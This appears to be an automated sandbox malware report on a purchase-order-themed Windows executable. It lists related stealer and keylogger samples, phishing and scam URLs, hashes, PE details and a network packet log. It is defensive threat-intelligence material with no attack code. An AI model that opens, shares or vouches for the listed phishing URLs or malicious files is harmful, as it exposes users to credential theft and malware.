	RFQ DM03058 pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.198.143
	DHL Waybill & Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.199.225
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
reallyfreegeoip.org	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	23343100IM00270839_Dekont1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	http://evvitteponn.info/	Get hash	malicious	HTMLPhisher	Browse	150.136.26.45
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	193.122.130.38
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	150.136.26.45
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Ie0peIFNbb.elf	Get hash	malicious	Mirai	Browse	140.238.15.111
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	158.101.44.242
	Adz5QlgN2Q.elf	Get hash	malicious	Mirai	Browse	140.91.238.12
	mips.elf	Get hash	malicious	Mirai	Browse	152.67.248.75
CLOUDFLARENETUS	https://attmailupdate245dfolders122returninboxye73.ubpages.com/7bf3b7ce-f1a0-11ee-989c/	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://estaleiroarrozal.com.br/wp-admin/form/New%20ATT/bill.charged.html	Get hash	malicious	Unknown	Browse	172.67.20.158
	https://req675secuere.ru/AUTH/SNF/Remittance_Advice_52477_4-2-2024.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://evvitteponn.info/	Get hash	malicious	HTMLPhisher	Browse	172.64.147.188
	https://att-100830-108730.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	https://track.tychon.bid/proceed.php?domain=yotube.com&hash=542bf9c77a6c3ffcfecf23e17a200e2a&u=eyJkb21haW4iOiJ5b3R1YmUuY29tIiwiZG9tYWluX2lkIjoiMTM3NjY2MiIsImZvbGRlcl9pZCI6bnVsbCwibWlkIjoiMTUxIiwiZmlsdGVyX2lkIjpudWxsLCJhZHZlcnRpc2VyX2lkIjoiMTI4IiwidGFyZ2V0IjoiaHR0cDpcL1wveG1sLXY0Lm90YmFja3N0YWdlMi5vbmxpbmVcL2NsaWNrP2k9dG9UOWlIQ0dxZ1lfMCIsImlwX2FkZHJlc3MiOiIxNDYuMTEyLjQ2LjcxIiwidHlwZSI6ImphdmFfcmVkaXJlY3QiLCJiaWQiOiIwLjAxNzUifQ==	Get hash	malicious	Unknown	Browse	104.21.38.176
	https://att-101390.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	https://sby.alazka.sch.id/cpsess822988566cpsess822988566/alazkaalazkaalazka343alazka/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://adfgh.pages.dev/	Get hash	malicious	TechSupportScam	Browse	172.66.47.23
	https://agensipekerjaanseamillenium.com/#enquiries@jjswaste.com.au&c=E,1,7cRCsIs-cED58qCTUXHFvKSWwwx36l9kobq9gTBoviqaxhyAyYPn3fjjicwFksAm57J7K5cv1GGeq5T2JgIGvi-zPAzV4HnBOj3y0z3Mww,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.21.79.204
PUBLIC-DOMAIN-REGISTRYUS	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	WNGO8CYRZG.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	F0A7vyQAuZ.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	RFQ DM03058 pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.198.143
	00121128902.exe	Get hash	malicious	AgentTesla	Browse	103.76.231.42
	PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	162.222.226.100
	DHL Waybill & Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	quote N4302-088.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
CLOUDFLARENETUS	https://attmailupdate245dfolders122returninboxye73.ubpages.com/7bf3b7ce-f1a0-11ee-989c/	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://estaleiroarrozal.com.br/wp-admin/form/New%20ATT/bill.charged.html	Get hash	malicious	Unknown	Browse	172.67.20.158
	https://req675secuere.ru/AUTH/SNF/Remittance_Advice_52477_4-2-2024.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://evvitteponn.info/	Get hash	malicious	HTMLPhisher	Browse	172.64.147.188
	https://att-100830-108730.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	https://track.tychon.bid/proceed.php?domain=yotube.com&hash=542bf9c77a6c3ffcfecf23e17a200e2a&u=eyJkb21haW4iOiJ5b3R1YmUuY29tIiwiZG9tYWluX2lkIjoiMTM3NjY2MiIsImZvbGRlcl9pZCI6bnVsbCwibWlkIjoiMTUxIiwiZmlsdGVyX2lkIjpudWxsLCJhZHZlcnRpc2VyX2lkIjoiMTI4IiwidGFyZ2V0IjoiaHR0cDpcL1wveG1sLXY0Lm90YmFja3N0YWdlMi5vbmxpbmVcL2NsaWNrP2k9dG9UOWlIQ0dxZ1lfMCIsImlwX2FkZHJlc3MiOiIxNDYuMTEyLjQ2LjcxIiwidHlwZSI6ImphdmFfcmVkaXJlY3QiLCJiaWQiOiIwLjAxNzUifQ==	Get hash	malicious	Unknown	Browse	104.21.38.176
	https://att-101390.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	https://sby.alazka.sch.id/cpsess822988566cpsess822988566/alazkaalazkaalazka343alazka/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://adfgh.pages.dev/	Get hash	malicious	TechSupportScam	Browse	172.66.47.23
	https://agensipekerjaanseamillenium.com/#enquiries@jjswaste.com.au&c=E,1,7cRCsIs-cED58qCTUXHFvKSWwwx36l9kobq9gTBoviqaxhyAyYPn3fjjicwFksAm57J7K5cv1GGeq5T2JgIGvi-zPAzV4HnBOj3y0z3Mww,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.21.79.204

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	172.67.177.134
	cBhUkqlChn.exe	Get hash	malicious	Orcus	Browse	172.67.177.134
	uk1HIyOQbk.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	uk1HIyOQbk.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	B266519287329.IMG	Get hash	malicious	XWorm	Browse	104.21.27.85
	https://demandsciencegrouptrk.cvtr.io/click?lid=57941&sid=&pid=11064	Get hash	malicious	Unknown	Browse	104.21.27.85
	setup.exe	Get hash	malicious	Unknown	Browse	104.21.27.85
	Copy#6505270.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.85
	alpha_cyber.exe	Get hash	malicious	XWorm	Browse	104.21.27.85
	alpha_cyber.exe	Get hash	malicious	XWorm	Browse	104.21.27.85
	rhhaefVtIm.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	AudioTranscript_448.html	Get hash	malicious	HTMLPhisher	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	Qr1l4eYX02.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\109__Purchase_Order.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.954555318380262
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	109__Purchase_Order.exe
File size:	518'656 bytes
MD5:	4a14a9dedd4dfe259949539090ccc9fe
SHA1:	31d7fe0d77ef9b7d3df2f1a2865c3823b116991e
SHA256:	9fc2770fbd67c9b6f9f244ac6ac0fa8810c3d50e08c7d77b332bf1447ab77fab
SHA512:	87a4f19ce0391e07cf44a90476e180e1d0d7593f760044cc1a264a4d633f458b5d4965acbfceae692936e5263af396b8293644cc17fed97b379a2eb716333210
SSDEEP:	12288:Mhfsby3wzyYyVF/W6OTj1JucaNz3ie6m/dzb8B+:PewzyYMfa1JZaVye6Ab8k
TLSH:	90B412DA2B785733CA252BFE1C662C0223F65513B6A2F2942EC3B2D215317534663F57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.n...............0.............2.... ........@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x47ff32
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9C6E185A [Sat Mar 1 16:54:50 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7fedf	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7e5ac	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7df38	0x7e000	eb843018ee6da3f75192f19223f27181	False	0.9553997705853174	data	7.962304539562137	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0x5ac	0x600	967a749b422fb9546ce082c9f2118e0e	False	0.4212239583333333	data	4.083969760278833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0xc	0x200	51d5faa8bc7c37d97b71f0da8131303d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80090	0x31c	data			0.435929648241206
RT_MANIFEST	0x803bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 01:20:57.462249041 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:57.703901052 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:20:57.704248905 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:57.704248905 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:57.945775986 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:20:57.947427988 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:20:57.955967903 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:58.198860884 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:20:58.247026920 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:58.380393028 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.380429983 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.380491972 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.387375116 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.387388945 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.648689985 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.648767948 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.653230906 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.653239012 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.653534889 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.697906971 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.740243912 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.943761110 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.943862915 CEST	443	49736	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:58.943944931 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.949177027 CEST	49736	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:58.953051090 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:59.195441008 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:20:59.197999954 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.198020935 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.198107004 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.198579073 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.198587894 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.247040987 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:59.456084967 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.457640886 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.457652092 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.767004013 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.767139912 CEST	443	49737	172.67.177.134	192.168.2.4
Apr 4, 2024 01:20:59.767294884 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.767641068 CEST	49737	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:20:59.771033049 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:20:59.772238970 CEST	49738	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:00.010092020 CEST	80	49738	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:00.010174036 CEST	49738	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:00.010502100 CEST	49738	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:00.012604952 CEST	80	49735	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:00.012655973 CEST	49735	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:00.247884989 CEST	80	49738	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:00.249517918 CEST	80	49738	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:00.258902073 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.258932114 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.259000063 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.259447098 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.259459972 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.293895960 CEST	49738	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:00.530822039 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.532664061 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.532679081 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.833949089 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.834091902 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:00.834156036 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.834491014 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:00.838702917 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:01.074820995 CEST	80	49740	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:01.074897051 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:01.075114012 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:01.311289072 CEST	80	49740	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:01.312144995 CEST	80	49740	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:01.313636065 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.313680887 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.313759089 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.314052105 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.314062119 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.356470108 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:01.573170900 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.574830055 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.574851036 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.877820015 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.877939939 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:01.877999067 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.878387928 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:01.881539106 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:01.882519960 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.117778063 CEST	80	49740	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:02.117870092 CEST	49740	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.123049021 CEST	80	49742	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:02.123133898 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.123254061 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.365925074 CEST	80	49742	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:02.367398977 CEST	80	49742	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:02.368681908 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.368716955 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.368801117 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.369050980 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.369066000 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.418895006 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.625092983 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.626640081 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.626656055 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.931055069 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.931183100 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:02.931241035 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.931626081 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:02.934756994 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:02.935729980 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.172337055 CEST	80	49744	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:03.172435045 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.172621012 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.175195932 CEST	80	49742	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:03.175251007 CEST	49742	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.409136057 CEST	80	49744	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:03.409989119 CEST	80	49744	193.122.6.168	192.168.2.4
Apr 4, 2024 01:21:03.411539078 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.411567926 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:03.411649942 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.411890030 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.411900997 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:03.465815067 CEST	49744	80	192.168.2.4	193.122.6.168
Apr 4, 2024 01:21:03.671797037 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 4, 2024 01:21:03.673227072 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 4, 2024 01:21:03.673242092 CEST	443	49745	172.67.177.134	192.168.2.4
